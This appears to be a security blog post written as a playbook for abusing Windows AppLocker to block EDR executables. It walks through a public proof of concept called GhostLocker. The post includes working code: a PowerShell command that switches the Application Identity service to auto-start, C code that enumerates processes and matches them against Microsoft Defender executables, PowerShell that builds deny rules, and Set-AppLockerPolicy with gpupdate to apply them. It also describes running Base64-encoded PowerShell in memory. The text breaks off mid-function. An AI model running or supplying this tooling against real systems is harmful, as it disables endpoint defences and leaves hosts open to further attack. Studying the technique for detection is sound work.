AppLocker was introduced by Microsoft in Windows 7 to enable organizations to define which executables, scripts or installers are allowed to run in their environments. AppLocker can reduce the attack surface by enforcing rules that allow only trusted executions. As a result, malicious code is prevented from running. It should be noted that AppLocker is not enabled by default and requires a solid understanding of the environment and user behaviour prior to any implementation. Threat actors could abuse AppLocker to deploy rules that will prevent EDR processes from execution in order to execute arbitrary commands and software on the asset without EDR disruption. Splunk identified a malware called “ Azorult loader ” back in 2022 that introduced this behaviour. Playbook The Application Identity service (AppIDSvc) is a built-in Windows service that acts as the policy engine for AppLocker. The service is responsible for determining the identity of an executable, DLL, script, or MSI by analysing the following: File Path : i.e. C:\Program Files\Security*.exe Publisher Signature : Digital Signature, Version, File Hash : SHA256 Authenticode hash validation Package Metadata : Company Name, Product Version, etc. If the service is stopped or disabled, AppLocker policies are not enforced on the host. AppLocker rules are stored in the following registry location: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\SrpV2 AppLocker Rules – Registry Key A proof of concept called GhostLocker was made publicly available that automates the process of creating AppLocker deny rules that target EDR executables. On assets where AppLocker is not enabled, the Application Identity service is not running. Application Identity – Default Startup Type The service status could be changed from Manual to Auto from the command prompt or via execution of the following PowerShell cmdlet. Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\AppIDSvc" -Name Start -Value 2 AppIDSvc Service Change via PowerShell Application Identity – Startup Type Auto AppLocker enforcement applies only to new process creation events. Threat actors should force the system to reboot before attempting to execute less op-sec techniques. Rebooting the system would affect cached credentials, as these will disappear from memory. The proof of concept dynamically loads from ntdll.dll the NtQuerySystemInformation API. HMODULE ntdll = GetModuleHandleA("ntdll.dll"); if (!ntdll) return false; _NtQuerySystemInformation NtQuerySystemInformation = (_NtQuerySystemInformation)GetProcAddress(ntdll, "NtQuerySystemInformation"); The structure to write process information is prepared in order to write into the allocated buffer the process image path. SYSTEM_PROCESS_ID_INFORMATION spi = { 0 }; spi.ProcessId = PID; spi.ImageName.MaximumLength = 1024; spi.ImageName.Buffer = (PWSTR)allocBuffer; The API NtQuerySystemInformation is then called to return the image path of the EDR processes. status = NtQuerySystemInformation( SystemProcessIdInformation, &spi, sizeof(spi), 0 ); The proof of concept takes a snapshot of the processes running on the asset using the CreateToolhelp32Snapshot API and performs enumeration of the processes via the Process32FirstW until there is a match with the target EDR processes. If a match is found, the information is printed on the console. HANDLE snap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); if (snap == INVALID_HANDLE_VALUE) return; PROCESSENTRY32W pe; pe.dwSize = sizeof(pe); if (Process32FirstW(snap, &pe)) { do { if (isTargetProcess(pe.szExeFile)) { printf( GREEN "[+] Found Target Process\n" RESET YELLOW " Name: " RESET "%ws\n" YELLOW " PID: " RESET "%lu\n", pe.szExeFile, pe.th32ProcessID ); printf("\n"); FuncNtQuerySystemInformation(pe.th32ProcessID); } } while (Process32NextW(snap, &pe)); } CloseHandle(snap); The system processes are compared against a predefined target list: const wchar_t* targetNames[] = { L"MpDefenderCoreService.exe", L"MsMpEng.exe", L"WinDefend.exe", }; During execution of the binary, the following information is printed on the console: GhostLocker – EDR Process Discovery GhostLocker generates deny rules for the targeted EDR processes. foreach ($exe in $ExeToBlock) { $id = [guid]::NewGuid().ToString() $name = Split-Path $exe -Leaf $dynamicBlockRules += '<FilePathRule Id="' + $id + '" Name="Block ' + $name + '" Description="Blocked by policy" UserOrGroupSid="S-1-1-0" Action="Deny">' $dynamicBlockRules += '<Conditions><FilePathCondition Path="' + $exe + '" /></Conditions>' $dynamicBlockRules += '</FilePathRule>' } The tool then applies the AppLocker policy and forces the system to refresh the group policy so the new rules can take effect immediately. Set-AppLockerPolicy -XmlPolicy $tempPath -ErrorAction Stop gpupdate /force | Out-Null It should be noted that the information is encoded in Base64 and that these actions are executed in memory. void RunPowerShellInMemory() { std::wstring script = BuildFullPowerShellScript(...